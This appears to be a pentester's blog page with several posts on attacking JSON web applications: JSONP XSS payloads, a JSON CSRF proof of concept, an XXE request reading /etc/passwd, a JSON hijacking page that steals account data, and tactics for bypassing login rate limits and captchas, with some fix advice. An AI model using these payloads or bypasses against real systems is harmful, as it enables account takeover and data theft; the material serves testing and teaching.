<strong>/site/getinfo?callback='alert('XSS');//</strong><br />
<br />
<strong>/site/getinfo?callback="alert('XSS');//</strong><br />
<br />
The payload depends on whether a single quote or a double quote is used in the tag.<br />
<br />
In the response the reflected value will look like this:<br />
<br />
<strong> {"callback":""alert(1)//1111"}</strong><br />
<br />
If the value is not filtered or sanitised, the payload will be executed and will comment out the rest of the section.<br />
<br />
The example will look like this:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIJCtWOltejQrs8oOWNtWr-LOuQ3-6H-4A9mg4w5w8oACQLA55V3qRBOYWLnFCzDSkozydgMclOgStQtr0pVJFI7dYW-HvrAbf73xReNAmO9xoF-9lusab3qTheJf2_P-IqPel8eAktMg/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIJCtWOltejQrs8oOWNtWr-LOuQ3-6H-4A9mg4w5w8oACQLA55V3qRBOYWLnFCzDSkozydgMclOgStQtr0pVJFI7dYW-HvrAbf73xReNAmO9xoF-9lusab3qTheJf2_P-IqPel8eAktMg/s640/1.png" width="640" /></a></div>
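The "callback" reflection described above, as an added example that is not the original post's code: render_unchecked() is the vulnerable pattern, where the parameter lands verbatim in a script body, and render_hardened() is the fixed form, which accepts only a plain JavaScript identifier and labels the response so the browser will not sniff it as HTML. The function and header names are assumptions.<br />

```python
"""JSONP 'callback' handling: the unchecked reflection beside a hardened
version.  Added example, not the original post's code; function names are
assumptions."""
import json
import re

# A JavaScript identifier, capped in length; quotes, parens and // are refused.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]{0,63}$")


def render_unchecked(callback, data):
    """Vulnerable: ?callback='alert('XSS');// is reflected as-is into the body."""
    return f"{callback}({json.dumps(data)})"


def render_hardened(callback, data):
    """Return (status, headers, body) for a JSON or JSONP response."""
    if callback is None:
        # Plain JSON: no script wrapper at all.
        return 200, {"Content-Type": "application/json; charset=utf-8",
                     "X-Content-Type-Options": "nosniff"}, json.dumps(data)
    if not CALLBACK_RE.match(callback):
        # Refuse instead of reflecting; the bad name never reaches the body.
        return 400, {"Content-Type": "text/plain; charset=utf-8",
                     "X-Content-Type-Options": "nosniff"}, "invalid callback name"
    headers = {"Content-Type": "application/javascript; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}
    # The leading /**/ is a common JSONP hardening so the response body never
    # starts with caller-chosen bytes (the Rosetta Flash mitigation).
    return 200, headers, f"/**/{callback}({json.dumps(data)});"
```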
<br />
<br />
<br />
<strong>3. JSON Hijacking.</strong><br />
<br />
A Detailed Information Is Present Here - <a href="http://www.websecgeeks.com/2016/04/json-hijacking.html" target="_blank">http://www.websecgeeks.com/2016/04/json-hijacking.html</a><br />
<br />
<strong>4. SQL Injection</strong><br />
<br />
SQL injection is a common vulnerability found in applications; SQL injection in JSON is the same as in normal applications.<br />
<br />
My suggestion is to check all the endpoint calls for this, because most developers forget to add sanitisation on them.<br />
<br />
Here is an example of SQL injection in a JSON endpoint:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAbRamL_HcKQVJPvB3JJQU0XR3VI6_VANloLT_W_jMiRfvlhqUWUzn21L1ytg2ybKcHJ1SVIsMk9CcJ8bxA36k9LSWj3rSkXeSImizwFqcDgE2LMIB2EHXobK_9vLY5Of16jzL2QueB6c/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAbRamL_HcKQVJPvB3JJQU0XR3VI6_VANloLT_W_jMiRfvlhqUWUzn21L1ytg2ybKcHJ1SVIsMk9CcJ8bxA36k9LSWj3rSkXeSImizwFqcDgE2LMIB2EHXobK_9vLY5Of16jzL2QueB6c/s640/12.png" width="640" /></a></div>
<br />
<br />
<br />
<strong>5. CSRF (Cross Site Request Forgery)</strong><br />
<br />
When we talk about CSRF in a modern web application like JSON, it feels a bit sticky =D<br />
<br />
A CSRF attack in a JSON application is typically the same as in a normal pre-JSON web application. Here is an example:<br />
<br />
POST /site/getuserinfo HTTP/1.1<br />
Host: websecgeeks.com<br />
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0<br />
Content-Type: application/json;<br />
Cookie: ifyoucanthackmeyouarenob=123213kkb2k3bkbk24$$;<br />
<br />
{"id":"1","email":"attacker@attacker.com"}<br />
<br />
<br />
<br />
We can perform the CSRF for this request as shown below.<br />
<html><br />
<form action="" enctype="application/json" method="POST"><br />
<input name='{"id":"1","email":"attacker@attacker.com"}' type='hidden'><br />
<input type=submit><br />
</form><br />
</html><br />
<br />
The enctype should be "application/json" because most JSON applications require this type of content to proceed.<br />
<br />
The enctype can be different for different applications; the possible values for the enctype attribute are as below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPTtU5R8veOq32JR9dVIl_erMO5zkTyS_dbjZjmnPSUKvAg7hfa9khw_nwdRPWk8Ms_SwA0tn1hg9gKhgEvX3N74gJHrG91mXxMvcsH0nGmKzfKW2TEL68zK1I0NQxGUuqvRzEY3rTOlc/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPTtU5R8veOq32JR9dVIl_erMO5zkTyS_dbjZjmnPSUKvAg7hfa9khw_nwdRPWk8Ms_SwA0tn1hg9gKhgEvX3N74gJHrG91mXxMvcsH0nGmKzfKW2TEL68zK1I0NQxGUuqvRzEY3rTOlc/s640/1.jpg" width="640" /></a></div>
<br />
<br />
As per my experience this normally doesn't work, due to JSON's tricky nature. So we use another example, which is also given on <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" target="_blank">OWASP</a>; actually I am going to use the same <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" target="_blank">OWASP</a> example with some modifications.<br />
<br />
So here is our example request:<br />
<br />
<strong>POST http://websecgeeks.com/site/transfermoney HTTP/1.1</strong><br />
<br />
<strong>Host:websecgeeks.com</strong><br />
<br />
<strong>Content-Type: application/json</strong><br />
<br />
<strong>Cookie : attackme:"sadasdasd&*&&&&";</strong><br />
<br />
<strong>{ "acct":"BOB", "amount":"100" }</strong><br />
<br />
For performing a CSRF attack the POC will look like this, according to OWASP:<br />
<br />
<strong><html></strong><br />
<strong><body onload="put()"></strong><br />
<strong><script></strong><br />
<strong>function put() {</strong><br />
<strong> var x = new XMLHttpRequest();</strong><br />
<strong> x.open("POST","http://websecgeeks.com/site/transfermoney",true);</strong><br />
<strong> x.setRequestHeader("Content-Type", "application/json"); </strong><br />
<strong> x.send(JSON.stringify({ "acct":"BOB", "amount":"100" })); </strong><br />
<strong>}</strong><br />
<strong></script></strong><br />
<br />
<strong></body></strong><br />
<strong></html></strong><br />
<br />
Now how sure are you that it will work? Any guesses =D Let's try it out. If we save this page as .html and open it in an authenticated session to test the CSRF, the HTTP headers will look like this:<br />
<br />
<strong>POST http://websecgeeks.com/site/transfermoney HTTP/1.1</strong><br />
<br />
<strong>Host:websecgeeks.com</strong><br />
<br />
<strong>Content-Type: application/json</strong><br />
<br />
<strong>{ "acct":"BOB", "amount":"100" }</strong><br />
<br />
<br />
<br />
Did you notice something? The authenticated session cookie is not set, which means this request will not work because it cannot get authenticated and request internal resources to perform the action.<br />
<h4>
<span style="text-decoration: underline;">"Here is where the twist comes in. We have to add another header called "<strong>access control allow credentials</strong>", which will instruct the browser to send the cookies related to the REQUESTED DOMAIN."</span></h4>
<br />
By default, CORS does not include cookies on cross-origin requests. This is unlike other cross-origin techniques.<br />
<br />
CORS requires both the server and the client to acknowledge that it is fine to include cookies on requests.
The server reserves the right to grant permission to include cookies by setting the Access-Control-Allow-Credentials header.<br />
<br />
So here I have added the same by using "<strong>x.withCredentials = true;</strong>"<br />
<br />
<strong><html></strong><br />
<strong><body onload="put()"></strong><br />
<strong><script></strong><br />
<strong>function put() {</strong><br />
<strong> var x = new XMLHttpRequest();</strong><br />
<strong> x.open("POST","http://websecgeeks.com/site/transfermoney",true);</strong><br />
<strong> x.setRequestHeader("Content-Type", "application/json"); </strong><br />
<strong> x.withCredentials = true;</strong><br />
<strong> x.send(JSON.stringify({ "acct":"BOB", "amount":"100" })); </strong><br />
<strong>}</strong><br />
<strong></script></strong><br />
<br />
<strong></body></strong><br />
<strong></html></strong><br />
<br />
This will be the final POC for JSON CSRF Attack.<br />
<br />
<b>Note: the CORS policy is required to be set to the star "*" to perform a cross-domain request. Otherwise, if the CORS policy is set to a specific domain or host, then the server will straight away refuse the attacker's cross-domain request as coming from an untrusted domain/input.</b><br />
<br />
<br />
<br />
<b> 6. XXE ( XML External Entity Injection)</b><br />
<br />
This is a very common attack found in JSON/modern web applications. It is due to improper handling of the content type of user input, which allows an attacker to access/read the web server's local files as well as perform command execution.<br />
<br />
POST /site/getinfo HTTP/1.1<br />
Host: websecgeeks.com<br />
Content-Type: application/json<br />
Content-Length: 38<br />
<br />
{"search":"narendrabhati","value":"noob"}<br />
<br />
<br />
<br />
Now we can send the same request, but this time in XML format:<br />
<br />
POST /site/getinfo HTTP/1.1<br />
Host: websecgeeks.com<br />
Accept: application/json<br />
<strong>Content-Type: application/xml</strong><br />
Content-Length: 160<br />
<br />
<?xml version="1.0" encoding="UTF-8" ?><br />
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><br />
<root><br />
<search>&xxe;</search><br />
<value>noob</value><br />
</root><br />
<br />
<br />
<br />
If the framework honours the Content-Type header and hands the body to an XML parser with external entities enabled, the application will usually choke on input it never expected; the resulting error message or response may echo the expanded entity, i.e. the contents of /etc/passwd. Read the response body carefully, and do not conclude from a clean response alone: the parser may still have fetched the file (blind XXE), which needs out-of-band confirmation.<br />
<br />
<br />
<br />
<strong>7. Session Management Vulnerabilities.</strong><br />
<br />
Session management should be checked as well: whether session identifiers and tokens can be brute-forced (length and randomness), whether logout and timeout actually terminate the session on the server side, and whether a token can be re-used after logout or after a password change.<br />
<br />
That is all about "Attacking JSON Application : Pentesting JSON Application". If anything should be updated or edited, or you have any questions, please comment.<br />
<br />
<br />
<br />
<strong>8. Open Redirection/Forwards End Points</strong><br />
<br />
Every open redirection and open forward endpoint should be checked carefully, because an open redirect can sometimes be escalated to reflected or stored XSS, depending on how the application uses the value.<br />
<br />
Here is an example of an open redirection:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic0HI7g-qkyex2yjuaGwuXCAZ3oIbo0nYBT86oRVock8gHr47zelh67Mj7pTJTbzlY-3r7leTVmZd1pJFLnFkhgSx9hBy-rCMZpCEY5NrOa2lAr0C-bEYqNvDcmk9hOMK-1N5e6CYpiss/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic0HI7g-qkyex2yjuaGwuXCAZ3oIbo0nYBT86oRVock8gHr47zelh67Mj7pTJTbzlY-3r7leTVmZd1pJFLnFkhgSx9hBy-rCMZpCEY5NrOa2lAr0C-bEYqNvDcmk9hOMK-1N5e6CYpiss/s640/14.png" width="640" /></a></div>
<br />
<br />
You can see that the "newurl" parameter value is reflected into a "javascript" block and an "href" attribute, which shows that the value is used as the new top location: whatever you put in this parameter, the browser will navigate to it as a full URL. So we inject "javascript:alert(1)" into "newurl"; the browser executes it as the new location, resulting in reflected XSS. The example is shown below.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2YMhWrKttMiyj5K6jfPkr88t8cvIx1aheo38z6Q_SN0WIjEqy5IVwAyIS9Et3j8WqkozYIjvIT0y5boHDClNYmr28_JIh71fq1K_SKqZ4k1V3IwN3MFzhmO0QT2NsFovr3V47TZGwvHY/s1600/xss-h1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2YMhWrKttMiyj5K6jfPkr88t8cvIx1aheo38z6Q_SN0WIjEqy5IVwAyIS9Et3j8WqkozYIjvIT0y5boHDClNYmr28_JIh71fq1K_SKqZ4k1V3IwN3MFzhmO0QT2NsFovr3V47TZGwvHY/s640/xss-h1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRK6McgvDUGU_7bJJeOBYlO0hy7vwlAmlUlCQhFOUST-aCbLJ9aFmW-GK1RlzT0rRrjjT4XIGpMc0DUjspFzD8Zlj4b725uuThKZYbKVAyTp6U3OaE9EczQGVIEC534nFYPe2TRWg6nVA/s1600/xss-domain.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRK6McgvDUGU_7bJJeOBYlO0hy7vwlAmlUlCQhFOUST-aCbLJ9aFmW-GK1RlzT0rRrjjT4XIGpMc0DUjspFzD8Zlj4b725uuThKZYbKVAyTp6U3OaE9EczQGVIEC534nFYPe2TRWg6nVA/s640/xss-domain.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjShDxyKAj_m8sV8CXaWUIyi6AvN0V4JjCEB4Un7QGX7aS4K5Ut58HBOLMIHjlHppOM7sUvkg7DAcvs1ESaarRCwo_J1RbBURFRFt4KTybcohH-uHPwSEwXXoDHRROgsieMlZbdUa9tq1M/s1600/xss-webpage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjShDxyKAj_m8sV8CXaWUIyi6AvN0V4JjCEB4Un7QGX7aS4K5Ut58HBOLMIHjlHppOM7sUvkg7DAcvs1ESaarRCwo_J1RbBURFRFt4KTybcohH-uHPwSEwXXoDHRROgsieMlZbdUa9tq1M/s640/xss-webpage.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
Thank You ! :)</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com10tag:blogger.com,1999:blog-3462277729309057123.post-3644771247004764362018-06-30T05:43:00.000+05:302019-09-13T13:14:18.118+05:30Bypass Rate Limit Brute Force Protection Login Attempt Protection Captcha Bypass<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnUcamzaKOPRxCR-i9nYsV-8gcoFT2KqBsLAwtZs-IbTigSmjWp3roCX0XBdrxw_0p-v0_jNYSulhL51RY_QonK18BL-XmDI59HeAvzHUsQoH-1TMq7CZV7oi2b6jHr4sYdY1A_hQiPr0/s1600/rate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnUcamzaKOPRxCR-i9nYsV-8gcoFT2KqBsLAwtZs-IbTigSmjWp3roCX0XBdrxw_0p-v0_jNYSulhL51RY_QonK18BL-XmDI59HeAvzHUsQoH-1TMq7CZV7oi2b6jHr4sYdY1A_hQiPr0/s320/rate.jpg" width="320" /></a></div>
<br />
<br />
Hello all. While pentesting an application we often run into brute-force protection, login-attempt limits and captcha-based protection, so today we will look at how to bypass rate limiting, brute-force protection, login-attempt protection and captchas.<br />
<br />
We will not use any ready-made tools for this, so let's begin!<br />
<br />
Many people consider this a minor issue, but from an attacker's point of view brute-forcing a login panel can hand over administrative privileges without having to find an RCE, SQL injection or other critical vulnerability that would give root or administrator-level access.<br />
<br />
Here I describe a number of techniques I have observed while pentesting or bug hunting.<br />
<br />
<br />
<a name='more'></a><br />
<br />
<strong>1. Using Random User-Agents</strong><br />
<br />
Many web applications track login attempts by User-Agent (browser), so it may be possible to bypass the protection by rotating through random User-Agent strings ( <a href="http://pastebin.com/zgvkU0tx" target="_blank">Click Here For User Agent Strings</a> ).<br />
<br />
<br />
<br />
<strong>2. Cookies Based Protection</strong><br />
<br />
On a recent pentest I observed that when we send multiple login requests, the server counts the attempts by cookie value. If we strip the cookies from every request while brute forcing, each request is treated as a new session and the limit is never reached.<br />
<br />
<strong>3. The Whole New Iframe Trick</strong><br />
<br />
Frankly, I still do not know why this trick works, but it is interesting.<br />
<br />
A few months ago I was pentesting a web application with several roles (admin, writer and viewer).<br />
<br />
The login panel had a captcha that bothered me every time I logged in, so I tried to bypass it.<br />
<br />
I simply loaded the login page inside an iframe and, to my surprise, the captcha was gone; I logged in with only the username and password and I was in. Whatever the cause, the captcha was evidently not enforced server-side for every login submission.<br />
<br />
<br />
<br />
<strong>4. Changing Referrer Value</strong><br />
<br />
Some web applications use the Referer header to tie login attempts together. Changing the Referer to an external domain on each request makes the application treat us as a new visitor arriving from that domain, which may bypass the protection.<br />
<br />
<br />
<br />
<strong>5. Mobile Version</strong><br />
<br />
This is an old, well-known technique, found by a friend of mine.<br />
<br />
Many web applications have a mobile version of the site, which may lack any login-attempt protection.<br />
<br />
Try to find it via Google, or try m.site.com, mobile.site.com and site.com/mobile;<br />
<br />
there are many URL patterns you can try.<br />
<br />
<br />
<br />
<b>6. Using The Same Captcha</b><br />
<br />
Due to misconfiguration, some applications accept the same captcha solution repeatedly. When the application asks for a captcha at login, intercept the request, change only the username or password value you are attacking, keep the captcha value as it is, and replay: the same captcha is accepted for every request.<br />
<br />
<br />
<br />
<strong>7. Time Delay Login Attack</strong><br />
<br />
Some applications rate-limit by the interval between login requests, so adding a delay between attempts may be enough to stay under the threshold and bypass the brute-force protection.<br />
<br />
<br />
<br />
<b>8. Changing User Name While Attacking</b><br />
<br />
Some applications count attempts per username: attack "admin" more than five times in a row and you are blocked. To get around this, first work out after how many attempts on one username the application blocks you. Then alternate: four attempts with the valid username, a fifth with an invalid username, another four with the valid one, and so on. Because the counter resets when the username changes, the protection never triggers.<br />
<br />
That is all I have observed so far; I will update the post if I find anything else useful. Thanks.<br />
<br />
Comments are always welcome. :)<br />
<br /></div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com4tag:blogger.com,1999:blog-3462277729309057123.post-89827642630937538182018-06-29T17:29:00.000+05:302019-09-13T12:54:51.954+05:30JSON Hijacking<div dir="ltr" style="text-align: left;" trbidi="on">
<h2>
JSON Hijacking</h2>
<br />
<br />
<br />
Today we will look at how to find a JSON Hijacking vulnerability.<br />
It only works on older browsers, but it is still worth understanding because it is a misunderstood and little-known vulnerability for many security people. I hope you will like it.<br />
<br />
<br />
<br />
<strong>What is JSON Hijacking?</strong><br />
<br />
JSON Hijacking is similar to CSRF (Cross Site Request Forgery), with one difference: in CSRF you trick the victim into performing an unwanted action, whereas in JSON Hijacking you trick the victim into opening a crafted page that reads data from the victim's account and passes it to the attacker.<br />
<br />
<strong>Who Are Affected To This?</strong><br />
<br />
This vulnerability is fixed in modern browsers, so a victim on a current browser cannot be exploited. Anyone still using an older browser can be.<br />
<br />
<br />
<strong>How We Can Find JSON Hijacking Vulnerability</strong><br />
<br />
<a name='more'></a><br />
<br />
There are three factors to check when exploiting JSON Hijacking.<br />
<br />
<strong>1. Compatibility With Old Browsers?</strong><br />
<br />
First, check whether the target application supports (and therefore has users on) older browsers.<br />
<br />
<strong>2.</strong> <strong>Access Control Allow Origin Is Present Or Not?</strong><br />
<br />
The Access-Control-Allow-Origin header comes into the picture when we talk about modern web applications.<br />
<br />
According To <strong><a href="https://www.owasp.org/index.php/Test_Cross_Origin_Resource_Sharing_(OTG-CLIENT-007)" target="_blank">OWASP </a></strong>- Access-Control-Allow-Origin is a response header used by a server to indicate which domains are allowed to read the response. Based on the CORS W3 Specification it is up to the client to determine and enforce the restriction of whether the client has access to the response data based on this header.<br />
<br />
In short, this header controls which third-party origins the browser allows to read the response with XMLHttpRequest or fetch.<br />
<br />
If you look at the HTTP response below, the "Access-Control-Allow-Origin" header is set to "trusteddomainofselfapplication.com", meaning only that origin can read data from this application cross-origin.<br />
<pre>HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 18:57:53 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u3
Access-Control-Allow-Origin: trusteddomainofselfapplication.com
Content-Length: 4
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: application/json</pre>
<br />
If "Access-Control-Allow-Origin" is pinned to a specific domain, cross-origin XMLHttpRequest reads fail, because we do not control that domain. Note that this header only governs XMLHttpRequest/fetch reads; a <script src> include is not subject to CORS, so the script-based hijack below does not depend on it either way.<br />
<br />
Now look at the response below: the header is present but set to "*", meaning any origin may read the response. This is a misconfiguration, but browsers refuse to expose a credentialed response to a wildcard origin, so "*" alone only leaks data that does not need the victim's session. The dangerous variant is a server that reflects the request's Origin and adds "Access-Control-Allow-Credentials: true": then any origin can read the authenticated JSON directly with XMLHttpRequest, in any browser, without needing JSON Hijacking at all.<br />
<pre>HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 18:57:53 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u3
Access-Control-Allow-Origin: *
Content-Length: 4
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: application/json</pre>
<br />
If the "Access-Control-Allow-Origin" header is absent, cross-origin XMLHttpRequest reads are blocked by default, and the script-include route described below is what remains.<br />
<br />
<strong>3. Vulnerable JSON Response!</strong><br />
<br />
A typical JSON endpoint returns its response in an array; it can look like this:<br />
<pre>[{"id":6,"accountholder":"narendrabhati","accountbalance":"$1000","useremail":"ourvictim@test.com"}]</pre>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNb_8cVS91RW9Q87OAnnGVoJmSMo2dxJJL4SGtMz0FZPsqTYFESl6gTXkGGAvesAW3oPzTYpLplzjoXaQLuC6UObNqW1_jGIzlBz9okQfTgc_R2HAQO1YJDt4zMpEA7oLXlA2V_gDVi0o/s1600/bank-info2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNb_8cVS91RW9Q87OAnnGVoJmSMo2dxJJL4SGtMz0FZPsqTYFESl6gTXkGGAvesAW3oPzTYpLplzjoXaQLuC6UObNqW1_jGIzlBz9okQfTgc_R2HAQO1YJDt4zMpEA7oLXlA2V_gDVi0o/s640/bank-info2.png" width="640" /></a></div>
<br />
<br />
<br />
Which kinds of JSON response are vulnerable?<br />
<br />
The picture below shows which response shapes are exploitable:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIkmV8OSt8RqN5iXxLtPlwwzv_-jvDw-15vOzQeQ3I3zwQp3y5eZvOnmjfMPy9YCKQ-1aRrmWXg0keftSo6IAizGwNIlnbt2WHnxNkJQgtAM4FUTDvRppK8euz-Tt9smXtnXZl3nVivko/s1600/vulnerable-response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIkmV8OSt8RqN5iXxLtPlwwzv_-jvDw-15vOzQeQ3I3zwQp3y5eZvOnmjfMPy9YCKQ-1aRrmWXg0keftSo6IAizGwNIlnbt2WHnxNkJQgtAM4FUTDvRppK8euz-Tt9smXtnXZl3nVivko/s640/vulnerable-response.png" width="640" /></a></div>
<br />
<br />
Vulnerable JSON Response - <a href="https://www.owasp.org/index.php/AJAX_Security_Cheat_Sheet#Protect_against_JSON_Hijacking_for_Older_Browsers" target="_blank">Click Here</a> To See Details<br />
<br />
<br />
<br />
<br />
<strong>Vulnerable/Exploitable</strong>:<br />
<br />
[{"object": "inside an array"}]<br />
<br />
========<br />
<br />
<strong>Not Vulnerable/Exploitable</strong><br />
<br />
{"object": "not inside an array"}<br />
========<br />
<br />
<strong>Also not Vulnerable/Exploitable</strong><br />
<br />
{"result": [{"object": "inside an array"}]}<br />
<br />
<br />
<br />
***********<br />
<br />
In our case the JSON response is:<br />
<pre>[{"id":6,"accountholder":"narendrabhati","accountbalance":"$1000","useremail":"ourvictim@test.com"}]</pre>
<br />
This is the vulnerable format: an array at the top level, i.e. the <strong>Vulnerable/Exploitable</strong> shape:<br />
<br />
[{"object": "inside an array"}]<br />
<br />
<br />
<br />
<br />
<br />
<strong>Exploiting The JSON Hijacking!</strong><br />
<br />
With all three requirements checked, it is time to exploit it.<br />
<br />
We use the following HTML page:<br />
<br />
<pre><html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>Json Hijacking WebSecurityGeeks</title>
</head>
<body>
  <script type="text/javascript">
    // Defined before the JSON is loaded: on old engines the setter fires when
    // the object literal in the response assigns "accountholder".
    Object.prototype.__defineSetter__('accountholder', function (obj) {
      alert('Hijacked Account Holder Name Is ' + obj);
    });
  </script>
  <!-- The JSON endpoint is included as a script; the victim's cookies are sent with the request. -->
  <script type="text/javascript" src="http://websecgeeks.com/bank/home/accountinfo/userdetails"></script>
</body>
</html></pre>
<br />
We host this page on a public or local server as required.<br />
<br />
Looking at the JSON response again, there are several fields: "id", "accountholder", "accountbalance" and "useremail".<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpd7e9rELume20l3P9916wJm9p3tqpnIlkMD2MduYcZeVBGdQ-cvKfcOp2cf-EjonF3jAmGdOXPCMrxCBXVUUCn-1_tb__zBrdXRQNvgBHt6usbMq3va7Z1RMObWgl78CwkNmhAy6Qus/s1600/bank-info2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHpd7e9rELume20l3P9916wJm9p3tqpnIlkMD2MduYcZeVBGdQ-cvKfcOp2cf-EjonF3jAmGdOXPCMrxCBXVUUCn-1_tb__zBrdXRQNvgBHt6usbMq3va7Z1RMObWgl78CwkNmhAy6Qus/s640/bank-info2.png" width="640" /></a></div>
<br />
If we want to hijack the "accountbalance" field instead, we change the property name in the <strong>__defineSetter__</strong> call, e.g.<br />
<br />
<strong>Object.prototype.__defineSetter__('accountbalance', function (obj) {</strong><br />
<br />
Since this only works on older browsers, I set up Mozilla Firefox 3.0.11.<br />
<br />
For the PoC I am logged in to the application and open the link sent by the attacker.<br />
<br />
As you can see, the "Account Balance" is hijacked from the victim's account.<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdsCqYHNzy3bIvRgTWhjwedJvTm_IbYnwfwcw2d3T2XCnVHKu5BCBmGMgCJGlS4w_3wj7iLRN0cADLbm1mbDomR_j8yA84PmczDugWjdcE8f7Kk8pKX4tRvdnCbr_5tTIeo4SEhoNCvFk/s1600/hijaced-data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdsCqYHNzy3bIvRgTWhjwedJvTm_IbYnwfwcw2d3T2XCnVHKu5BCBmGMgCJGlS4w_3wj7iLRN0cADLbm1mbDomR_j8yA84PmczDugWjdcE8f7Kk8pKX4tRvdnCbr_5tTIeo4SEhoNCvFk/s640/hijaced-data.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<strong>How To Fix This?</strong><br />
<br />
<br />
<br />
A well documented details are available on <a href="https://www.owasp.org/index.php/AJAX_Security_Cheat_Sheet#Protect_against_JSON_Hijacking_for_Older_Browsers" target="_blank">OWASP</a><br />
<br />
<a href="https://www.owasp.org/index.php/AJAX_Security_Cheat_Sheet#Protect_against_JSON_Hijacking_for_Older_Browsers" target="_blank">https://www.owasp.org/index.php/AJAX_Security_Cheat_Sheet#Protect_against_JSON_Hijacking_for_Older_Browsers</a><br />
<br />
From that page, several measures make the application secure.<br />
<br />
<strong>1) <span class="mw-headline" id="Always_return_JSON_with_an_Object_on_the_outside">Always return JSON with an Object on the outside</span></strong><br />
<br />
Always have the outside primitive be an object for JSON strings:<br />
<br />
Vulnerable:<br />
<br />
[{"object": "inside an array"}]<br />
<br />
====<br />
<br />
Not Vulnerable<br />
<br />
{"object": "not inside an array"}<br />
===<br />
<br />
Also not Vulnerable<br />
<br />
{"result": [{"object": "inside an array"}]}<br />
<br />
<br />
<br />
<strong>2) <span class="mw-headline" id="Origin_.26_Access-Control-Allow-Origin">Access-Control-Allow-Origin</span></strong><br />
<br />
<span class="mw-headline">Restricting "Access-Control-Allow-Origin" to our own trusted origins stops third-party pages from reading the JSON with XMLHttpRequest, because the attacker does not control those origins. It does not stop a <script src> include, so it complements the first fix rather than replacing it.</span><br />
<br />
Even then we should take care, because an attacker can abuse application functionality to get onto a trusted origin.<br />
<br />
<span class="mw-headline">Suppose you have added "anytrusteddomain.com" to "Access-Control-Allow-Origin", and that site (or your own) has an upload feature that serves user-supplied HTML. The attacker uploads the JSON hijacking page there, and it now runs from a trusted origin, so the data can be read despite the header.</span><br />
<br />
<br />
<br />
